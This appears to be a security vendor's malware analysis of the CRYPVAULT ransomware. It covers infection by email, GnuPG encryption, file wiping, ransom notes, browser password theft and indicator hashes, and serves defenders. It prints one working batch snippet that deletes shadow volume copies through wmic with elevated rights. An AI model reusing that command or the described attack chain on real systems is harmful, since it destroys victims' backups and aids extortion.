We uncovered a new crypto-ransomware variant with new routines that include making encrypted files appear as if they were quarantined files. These files are appended by a *.VAULT file extension, an antivirus software service that keeps any quarantined files for a certain period of time. Antivirus software typically quarantines files that may potentially cause further damage to an infected system.

Infection chain

Arrival Vector

The malware arrives to affected systems via an email attachment. When users execute the attached malicious JavaScript file, it will download four files from its C&C server:

Crypto-ransomware detected as BAT_CRYPVAULT.A

SDelete – Microsoft Sysinternals tool (will be renamed to audiodg.exe by the malware)

GnuPG – executable open-source encryption tool (will be renamed to svchost.exe by the malware)

Library file of GnuPG (will be renamed to iconv.dll by the malware)

The script will execute the crypto-ransomware after downloading the files mentioned above. The downloaded files are then saved in the %User Temp% folder.

Figure 1. Email attachment named – Akt_Sverki_za_2014_year_Buhgalterija_SIGNED-ot_17.02_2015g_attachment.AVG.Checked.OK.pdf.js

I observed that the cybercriminals may have purposely added strings found in known virus scanner logs (such as in AVG, Microsoft, etc.) in order to bypass their scan engines.

Encryption Routine

Upon execution, the malware installs an open source encryption tool called GNU Private Guard (GnuPG) into the affected system, which starts the encryption process. This file will generate an RSA-1024 public and private key pair used in the encryption of user files.

Figure 2. Generated files of GnuPG (private – secring.gpg and public – pubring.gpg)

It then looks for files to encrypt. The files extensions it targets are as follows:

*.xls

*.doc

*.pdf

*.rtf

*.psd

*.dwg

*.cdr

*.cd

*.mdb

*.1cd

*.dbf

*.sqlite

*.jpg

*.zip

Figure 3. The malware searches for files from its list of file extensions and encrypts the file using dropped file by the malware called svchost.exe (a GnuPG executable)

(Click to enlarge image)

The malware avoids this list of folders to avoid system malfunction:

abbyy

adobe

amd64

application

autograph

avatar

avatars

cache

clipart

com_ intel

common

csize

framework64

games

guide

internet

library

manual

maps

msoffice

profiles

program

recycle

resource

resources

roaming

sample

setupcache

support

template

temporary

texture

themes

thumbnails

uploads

windows

After encrypting the user’s files, the malware will then append a *.vault file extension.

Ransom Notes

The malware uses the following script to make the affected system display the ransom note when the file is opened:

Figure 4: Script used by the malware to display the ransom note

(Click to enlarge image)

After encryption, the malware will change all associated *.vault file extensions to padlock icons. Each “locked” and encrypted file will display a ransom note when opened, as displayed in the image below.

Figure 5. Opening any of the files encrypted by BAT_CRYPVAULT.A leads to a ransom note displayed by VaultCrypt. Users will need to upload the Vault key file that the malware drops in the desktop folder to gain access to the site.

The malware also drops a .TXT file and displays a message on the infected system’s desktop instructing users on how to pay the ransom price in order to decrypt the files. We observed that this particular attack appears to target users in Russian-speaking countries as the attached file name, ransom note, and ransomware support portal are all in Russian.

Figure 6. The dropped file VAULT.txt written in Russian is found in the Desktop folder. It provides instructions how to decrypt the files.

Figure 7. Ransom note via an HTML executable file (.HTA file) that is displayed on infected system’s desktop after the encryption of user’s files

Deleting backup, traces of encryption, and malware components

The malware deletes key files, secring.gpg, vaultkey.vlt and confclean.lst by using sDelete. a Microsoft Sysinternals tool. sDelete is is capable of overwriting a deleted file’s disk data that makes it difficult or nearly impossible to recover deleted files

Though this isn’t the first time we’re seeing SDelete being used in crypto-ransomware attacks, it appears that this is a first for malware to use 16 overwrite passes to make sure that recovery tools will have a hard time trying reconstructing the deleted file. This file arrives in the affected system together with the ransomware.

Figure 8. Key files deleted that were used in the encryption process

Figure 9. The malware deletes the key files using sDelete

The malware deletes shadow volume copies if it exists in the system.

echo Set objShell = CreateObject^(“Shell.Application”^) > “%temp%\win.vbs” echo Set objWshShell = WScript.CreateObject^(“WScript.Shell”^) >> “%temp%\win.vbs” echo Set objWshProcessEnv = objWshShell.Environment^(“PROCESS”^) >> “%temp%\win.vbs” echo objShell.ShellExecute “wmic.exe”, “shadowcopy delete /nointeractive”, “”, “runas”, 0 >> “%temp%\win.vbs”

Figure 10. The malware deletes its components at the end of its routine

Downloads info-stealing malware

The malware also downloads and executes a hacking tool called Browser Password Dump by SecurityXploded from its C&C server. The tool is capable of extracting stored login passwords from the following web browsers:

Mozilla Firefox

Internet Explorer

Google Chrome

CoolNovo

Opera Browser

Safari

Flock

SeaMonkey

SRWare Iron

Comodo Dragon

After execution of the tool, the malware resumes control and drops a visual basic script called up.vbs that will upload the password dump report back to the C&C server.

Conclusion

We’ve also noticed that despite being a new crypto-ransomware variant, CRYPVAULT appears to possess limited functionalities as it is not coded using programming language; rather was written in a batch script. It also doesn’t import any libraries or create functions, and the components that come with the malware carry out the bulk of its malicious routines. This shows how easy it is for cybercriminals to create new crypto-ransomware variants.

Ransomware is becoming the next big thing that the threat actors create. Making important user files unusable forces more people to pay the ransom. As more ransomware appear in the wild, it is advised to back up files on a regular basis.

Related hashes:

Ransomware Downloader

26f412edd315f4031f5d4e7fcf37f2bb82d6062c

BAT_CRYPVAULT.A

7c76361ae1402246a46fa12b5d7f0d58cff3f8c1

41703605ee631c7aa3a671293062c1d2b88d758b

279759d6037f201f2375e6d120a24c39c4ae96c3

8d1009dc2e89990a67402eb059eb58d83b01983b

0524275053a4be37df60aee6273664893c5b0f2d

0915b41b55a162ad0c376d5c24b9810fcdf30192

0abb675915b3c662f5913a410e70f47cda23c9bc

c75ce003e2d994f65c863b3cd3539c178cd86e02

HKTL_BROWPASS

98718c8ff50450e14e16140517a3ae8bc8cabb46

Update as of April 7, 2015, 11:00 P.M. PST:

We have edited the first paragraph of the entry to clarify a statement about the quarantined files.

Credit goes to keydet89 (@keydet89), Ryan Kazanciyan (@ryankaz42), and InfoSec Taylor Swift (@SwiftonSecurity) for initiating a discussion about the description of the files.